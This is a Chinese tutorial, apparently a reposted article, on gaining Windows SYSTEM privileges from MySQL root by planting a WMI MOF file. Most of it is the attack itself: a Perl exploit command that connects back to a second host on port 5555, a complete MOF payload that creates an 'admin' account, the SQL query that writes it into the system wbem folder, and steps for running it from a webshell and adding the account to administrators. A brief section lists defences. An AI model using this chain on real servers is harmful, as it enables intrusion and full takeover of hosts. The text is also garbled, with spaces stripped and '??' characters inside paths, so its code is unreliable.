【.com原稿】MySQLRootAuthorityMOF提权方法来自国外kingcope大牛发布的MySQLScanner&MySQLServerforWindowsRemoteSYSTEMLevelExploit(https://www.exploit-db.com/exploits/23083/),简称mysql远程提权0day(MySQLWindowsRemoteSystemLevelExploit(Stuxnettechnique)0day)。WindowsManagementInstrumentation(WMI)提供了以下三种将托管对象格式(MOF)文件编译到WMI存储库中的方法:方法1:通过将Mofcomp.exe文件指定为命令行参数来运行MOF文件。方法2:使用IMofCompiler接口和$CompileFile方法。方法3:将MOF文件拖放到%SystemRoot%\System32\Wbem\MOF文件夹中。Microsoft建议您使用前两种方法将MOF文件编译到存储库中。即,运行Mofcomp.exe文件,或使用IMofCompiler::CompileFile方法。提供第三种方法只是为了与早期版本的WMI向后兼容,不应使用,因为此功能在未来版本中可能不可用。注意使用MOF方式提权的前提是当前Root账户可以复制文件到%SystemRoot%\System32\Wbem\MOF目录下,否则会失败!001漏洞利用方法分析利用该漏洞的前提是必须有mysql的root权限,在Kingcope发布的0day发布了PL利用脚本。perlmysql_win_remote.pl192.168.2.100root""192.168.2.1505555192.168.2.100为mysql数据库所在服务器,mysql密码为空,跳到192.168.2.150的5555端口。1、生成nullevt.mof文件,将以下代码保存为nullevt.mof文件:#pragmanamespace("\\\\.\\root\\subscription")instanceof__EventFilteras$EventFilter{EventNamespace="Root\\Cimv2";Name="filtP2";Query="Select*From__InstanceModificationEvent""WhereTargetInstanceIsa\"Win32_LocalTime\"""AndTargetInstance.Second=5";QueryLanguage="WQL";};instanceofActiveScriptEventConsumeras$Consumer{Name="consPCSV2";ScriptingEngine="脚本";ScriptText="varWSH=newActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exeuseradminadmin/add")";};instanceof__FilterToConsumerBinding{Consumer=$Consumer;Filter=$EventFilter;};2.通过Mysql查询导入文件并执行如下查询语句,将上面生成的nullevt.mof导入到c:\windows\system32\wbem\mof\目录下。windows7默认拒绝访问。导入后系统会自动运行并执行命令。selectload_file('C:\\RECYCLER\\nullevt.mof')intodumpfile'c??:/windows/system32/wbem/mof/nullevt.mof';002实际使用1.实验环境本实验环境为Windows2003+Apache+PHP,已经具备Webshel??l权限。2.上传文件到可写目录将nullevt.mof文件上传到服务器的可写目录,例如C:\RECYCLER\,如图5-4所示。上传文件nullevt.mof3。执行配置中国菜刀的命令,然后通过数据库管理执行查询命令。在执行查询命令之前,需要先选择数据库,然后将下面的代码复制到查询语句输入框中,如图5-5所示。选择load_file('C:\\RECYCLER\\nullevt.mof')到转储文件'c:/windows/system32/wbem/mof/nullevt.mof';执行查询命令4.查看执行结果执行完成后,需要修改和添加用户命令是将用户添加到管理员组,即“net.exelocalgroupadministratorsadmin/add\”,再次上传查询,如图5-6所示,通过netuser查看,果然系统中已经添加了admin。添加用户成功003预防方法MysqlRoot权限MOF方法提升前提条件是能够将上传的nullevt.mof复制到系统目录下,如c:\windows\system32\wbem\mof,如果不能复制,权利将被提升失败。一般Windows2003以下操作系统效果较好,Windows2008及以上操作系统受保护机制影响效果较差。因此,可以采取以下措施来防止:1、在程序数据库连接文件中尽量不要使用Root账号进行连接。2、root账户采用强加密方式,使用大小写字母+数字+特殊字符,密码个数15个以上。3、Mysql数据库mysql数据库目录权限严格限制,以及IIS用户无法读取和写入该文件。4、禁止写入操作系统目录c:\windows\system32\wbem。【原创稿件,合作网站转载请注明原作者和出处为.com】
